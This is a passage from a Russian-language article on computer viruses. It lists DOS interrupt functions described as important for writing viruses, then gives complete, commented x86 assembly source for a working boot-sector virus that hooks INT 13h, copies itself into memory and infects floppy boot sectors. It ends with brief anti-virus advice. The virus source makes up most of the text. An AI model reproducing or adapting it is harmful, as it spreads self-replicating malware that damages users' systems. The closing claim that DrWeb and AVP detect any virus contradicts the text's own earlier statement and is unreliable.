12. Завершить программу.
В большинстве случаев для написания вируса широко используются функции DOS-а. Их достаточно много всех не будем рассматривать, приведу пример только одного из них.
DOS, функция 21h
Считать произвольную запись файла
Вход:
AH-21h
DS:DX - адрес открытого FCB (Таблица Б-2)
Выход:
AL=OOh, если чтение было успешным и DTA заполнена данными
AL°01h, если достигнут конец файла (EOF) и чтения не было
AL=02h, если произошел выход за сегмент (чтения нет)
AL°03h, если встречен EOF и усеченная запись дополнена нулями
Описание.
Данная функция читает из файла с текущей позиции как с указанной в полях FCB "Запись с текущей позиции" и "Номер записи при непосредственном доступе к файлу".
Другие функции:
DOS, функция OOh
Завершить программу
DOS, функция 01h
Считать со стандартного устройства ввода
DOS, функция 02h
Записать в стандартное устройство вывода
DOS, функция 03h
Считать символа со стандартного вспомогательного устройства
DOS, функция 04h
Записать символ в стандартное вспомогательное устройство
DOS, функция 05h
Вывести на принтер
DOS, функция 06h
Консольный ввод-вывод
DOS, функция 09h
Запись строки на стандартный вывод
DOS, функция OAh
Ввод строки в буфер
DOS, функция ODh
Сброс диска
DOS, функция OEh
Установить текущий диск DOS
DOS, функция 13h
Удалить файл через FCB
DOS, функция 15h
Последовательная запись в файл через FCB
DOS, функция 17h
Переименовать файл через FCB
DOS, функция 22h
Писать произвольную запись файла
DOS, функция 26h
Создать новый PSP
DOS, функция 27h
Читать произвольный блок файла
DOS, функция 28h
Писать произвольный блок файла
DOS, функция 31h
Завершиться и остаться резидентным
DOS, функция 3Ah
Удалить оглавление
DOS, функция 41h
Удалить файл
DOS, функция 43h
Установить/опросить атрибуты файла
DOS, функция 44h
Управление устройством ввода/вывода
DOS, функция 4Bh
Выполнить или загрузить программу
DOS, функция 4Ch
Завершить программу
DOS, функция 57h
Установить/опросить дату/время файла
DOS, функция 5Ah
Создать уникальный временный файл
DOS, функция 68h
Завершить файл.
Список наиболее часто используемых функций DOS.(ассемблер пример)
[AK] Вот список функций, которые важно помнить при разработке вирусов:
Установить адрес DTA.
~~~~~~~~~~~~~~~~~~~~~
вход:
ah = 1Ah
ds:dx = адрес
выход:
нет
Получить адрес DTA.
~~~~~~~~~~~~~~~~~~~
вход:
ah = 2Fh
выход:
es:bx = текущий адрес
Create - Создать файл.
~~~~~~~~~~~~~~~~~~~~~
вход:
ah = 3Ch
cx = атрибуты файла (таб 1)
ds:dx = путь и имя файла в формате asciz
выход:
if CF=0 then
ax = дескриптор файла
else
ax = код ошибки (3,4,5) (таб 2)
Open - Открыть существующий файл
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
вход:
ah = 3Dh
al = режим доступа (таб 2)
cx = атрибуты
ds:dx = имя
выход:
if CF=0 then
ax = дескриптор файла
else
ax = код ошибки (1,2,3,4,5,0C)
Close - Закрыть файл
~~~~~~~~~~~~~~~~~~~~
вход:
ah = 3Eh
bx = дескриптор
ds:dx = имя
выход:
if CF=0 then
ax =
else
ax = код ошибки (6)
Read - Чтение из файла
~~~~~~~~~~~~~~~~~~~~~~
вход:
ah = 3Fh
bx = дескриптор
cx = число байт
ds:dx = буфер для чтения
выход:
if CF=0 then
ax = число прочитанных байт
Это значение может быть меньше CX.
Например потому, что превысили длину файла.
else
ax = код ошибки (5,6)
Write - Записать в файл
~~~~~~~~~~~~~~~~~~~~~~~
вход:
ah = 40h
bx = дескриптор
cx = число байт
ds:dx = данные для записи
выход:
if CF=0 then
ax = число записанных байт
else
ax = код ошибки (5,6)
Unlink - Удалить файл
~~~~~~~~~~~~~~~~~~~~~
вход:
ah = 41h
cx = атрибуты
ds:dx = имя
выход:
if CF=0 then
ax =
else
ax = код ошибки (2,3,5)
LSeek - Установить указатель в файле
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
вход:
ah = 42h
al = точка отсчета указателя:
0 - от начала файла
1 - от текущего положения
2 - от конца
bx = дескриптор
cx:dx = смещение (cx=старшие 16 бит, dx=младшие)
выход:
if CF=0 then
dx:ax = новое положение указателя относительно начала
else
ax = код ошибки (1,6)
Получить атрибуты файла
~~~~~~~~~~~~~~~~~~~~~~~
вход:
ax = 4300h
ds:dx = имя
выход:
if CF=0 then
cx = атрибуты
else
ax = код ошибки (1,2,3,5)
Chmod - Установить атрибуты файла
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
вход:
ax = 4301h
cx = новые атрибуты
ds:dx = имя
выход:
if CF=0 then
ax =
else
ax = код ошибки (1,2,3,5)
Выделить блок памяти
~~~~~~~~~~~~~~~~~~~~
вход:
ah = 48h
bx = размер блока в параграфах
выход:
if CF=0 then
ax = сегмент блока
else
ax = код ошибки (7,8)
bx = размер наибольшего доступного блока
Освободить память
~~~~~~~~~~~~~~~~~
вход:
ah = 49h
es = сегмент блока
выход:
if CF=0 then
ax =
else
ax = код ошибки (7,9)
Изменить размер блока памяти
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
вход:
ah = 4Ah
bx = новый размер
es = сегмент
выход:
if CF=0 then
ax =
else
ax = код ошибки (7,8,9)
bx = размер наибольшего доступного блока
Exec - загрузить или выполнить программу.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
вход:
ah = 4Bh
al = тип загрузки:
0 - загрузить и выполнить
1 - загрузить и не выполнять
3 - загрузить оверлей
4 - загрузить и выполнить в фоновом режиме (dos 4.0)
es:bx = блок параметров (таб 3)
ds:dx = имя программы
выход:
if CF=0 then
bx,dx разрушены
else
ax = код ошибки (1,2,5,8,0A,0B)
Пример элементарного BOOT-вируса:
.286
.model tiny
.code
org 00h
start: jmp install
;jmp fkс
table: ; А вот тут будет таблица диска
org 4ch ; много места ей, но...
fkс: nop ;
xor di,di ; обнулим их
mov ds,di ; DS=0
cli ;
mov ss,di ; SS=0
mov si,7c00h ; SI - адрес в памяти, там мы
; начинаемся.
mov bx,si ; запомним это... еще пригодится
mov sp,si
sti
dec word ptr ds:[0413h] ; стока памяти дос
mov ax,ds:[0413h] ; в АХ размер дос-памяти в килобайтах
mov cl,06 ; чтобы получить сегмент надо число
shl ax,cl ; килобайт умножить на 40h
; немного арифметики - сегмент считают
; от начала памяти в параграфах, пара-
; граф=10h байт, 40h параграфов=400h
; байт=1кБт. дальше все ясно.
mov es,ax ; ES=адрес нового сегмента
push ax ; в стек его - будем делать переход
mov ax,offset inst_int ; на это вот смещение
push ax ; и его в стек тоже
mov cx,200h ; но сперва надо перенести свое тело
cld ; в этот вот сегмент
rep movsb ; переносим
retf ; переход через стек
inst_int: ; здесь мы уже в новом сегменте
mov ax,ds:[13h*4] ; INT 0E0h=INT 13h original
mov ds:[0e0h*4],ax ;
mov ax,ds:[13h*4+2] ;
mov ds:[0e0h*4+2],ax ;
mov word ptr ds:[13h*4],offset int13 ; INT 13h=наш обработчик
mov ds:[13h*4+2],cs ;
xor cx,cx
push cx ; снова подготовка к переходу
push bx ; через стек в точку 0000:7C00h
mov es,cx
mov ax,0201h ; читать нормальный бут-сектор
mov cx,cs:floppy_sect ; вот отсюда его и читать
mov dh,cs:floppy_head ;
xor dl,dl ; с диска А: естественно
int 0e0h ; вызов оригинального INT 13h
run_boot:
retf ; запустить бут.
;------ *** Hаш обработчик INT 13h *** -------
int13: mov cs:shit,ax ; сохраним ax
int 0e0h ; выполним операцию
jnc int_continue ; если была ошибка уходим
jmp int_exit
int_continue:
pushf ; флаги запомнить надо!
cmp byte ptr cs:[shit+1],2 ; reading sectors?
jnz g1
cmp cx,0001
jne g1
cmp dh,0 ; читаем бут
jne g1
cmp dl,01 ; не с винта надеюсь?
jna fkс_boot
g1: jmp get_out
;------------- Обработчик чтения бута с дискеты ---------------
fkс_boot:
pusha
push ds es
push es
pop ds
lea di,fkс ; сравним то что у нас по смещению fkс
mov ax,cs:[di] ; с тем что мы прочитали по тому же смещению
mov si,bx ; Так мы проверяем заражен ли
add si,offset fkс ; уже нами бут-сектор
cmp ax,[si] ;
jz exit_boot_work ; если нет то уйдем отсюда
cmp dl,1 ; на всякий пожарный :) В принципе можете
ja exit_boot_work ; эту проверку выкинуть - она уже была
find_place: ; поиск места куда прятать старый бут-сектор
mov ax,[bx+16h] ; ax=число секторов в FAT
mul byte ptr [bx+10h] ; умножим его на число FAT
add ax,[bx+0eh] ; прибавим число резервных секторов для FAT--
push dx ; запомним dx - там номер диска и сторона |
mov cl,4 ; |
mov dx,[bx+11h] ; dx=число элементов корневого каталога |
; 1 элемент занимает 32 байта |
shr dx,cl ; поделим его на 16 - получим число сектров |
; корня, вроде бы так... |
add ax,dx ; прибавим к AX------------------------------
dec ax ; уменьшим на 1
; в AX порядковый номер последнего сектора
; ROOT'a... ???
mov cx,[bx+18h] ; cx=число секторов на дорожке
push cx ; запомним его
shl cx,1 ; умножим на 2
xor dx,dx ; dx=0
div cx ; поделим DX:AX на CX
pop cx ; вытащим CX из стека - там число секторов на
; дорожке было
push ax ; запомним частное от предыдущего деления
mov ax,dx ; в AX занесем остаток от деления
xor dx,dx ; DX=0
div cx ; поделим еще раз
mov dh,al ; DH=номер головки
mov cl,dl ; CL=номер сектора
pop ax ; выкинем AX
mov ch,al ; CH=номер дорожки
inc cl ; прибавим к нему 1
pop ax ; AX=бывшее DX - там была сторона и номер
; дисковода
mov dl,al ; номер в DL
mov cs:floppy_sect,cx ; то что получилось запомним
mov cs:floppy_head,dh
;---------all found dh,cx rules---------
mov ax,0301h ; записать старый бут куда надо
int 0e0h
jc exit_boot_work ; если была ошибка - прекратить работу
; чтобы не убить диск совсем
; можно этого и не делать, едва ли что
; случится - вероятность того что вычисленный
; нами сектор BAD очень низка, но...
push cs
pop es
lea di,table ; скопируем из бута в свое тело таблицу
mov si,bx ; параметров диска
add si,offset table ;
mov cx,4ch-3 ;
rep movsb ;
push cs
pop es
mov ax,0301h ; запишемся в бут-сектор
xor bx,bx
mov cx,0001
xor dh,dh
int 0e0h
exit_boot_work:
pop es ds ; восстановим все что убили
popa
get_out:
popf ; и флаги обязательно
int_exit:
retf 2 ; выход из прерывания
;-------------data block--------------
floppy_sect dw 2f08h
floppy_head db 01
shit dw 0
org 510
sign dw 0aa55h ; чтобы не выдавали сообщения NDD и прочие...
; это просто метка системного сектора
; ----- Инсталлятор вируса в бут дискеты -----
install:
mov cs:[0000],4aebh
mov byte ptr cs:[0002],090h ; нужная команда
push ds
xor ax,ax
mov ds,ax
mov ax,ds:[13h*4]
mov ds:[0e0h*4],ax
mov ax,ds:[13h*4+2]
mov ds:[0e0h*4+2],ax
mov word ptr ds:[13h*4],offset int13
mov ds:[13h*4+2],cs
pop ds
push cs
pop es
mov ax,0201h
mov cx,0001
mov dx,0000
mov bx,offset our_buffer
int 13h
xor ax,ax
mov ds,ax
mov ax,ds:[0e0h*4]
mov ds:[13h*4],ax
mov ax,ds:[0e0h*4+2]
mov ds:[13h*4+2],ax
mov ax,4c00h
int 21h
our_buffer:
end start
Существуют очень много вирусов, под разные операционные системы, имеющие различные цели, написанные на разных языках высокого и низкого уровней.
МЕТОДЫ БОРЬБЫ С ВИРУСАМИ.
Почему-то многие считают, что антивирус может обнаружить любой вирус, то есть, запустив антивирусную программу или монитор, можно быть абсолютно уверенным в их надежности. Дело в том, что антивирус - это тоже программа, конечно, написанная профессионалом. Но эти программы способны распознавать и уничтожать только известные вирусы. На 100% защититься от вирусов практически невозможно (как если бы, пользователь меняется дискетами с друзьями, а также получает информацию из других источников, например из сетей). Если же не вносить информацию в компьютер извне, заразиться вирусом невозможно - сам он ни когда не родится.
Наиболее широкое распространение по борьбе с вирусами получили такие программы как DrWeb и AVP. Благодаря своим новейшим детекторам, они могут обнаружить любые вирусы - как самые старые, так и только что появившиеся. Всегда нужно проверять файлы, попадающие на компьютер. Любой из них может быть заражен вирусом, это нужно помнить. Стараться никогда не давать работать посторонним на вашем компьютере - именно они
чаще всего приносят вирусы. Особое внимание следует уделять играм -
чаще всего вирусы распространяются именно так. Новые игры и программы всегда нужно проверять на вирус.
0 комментариев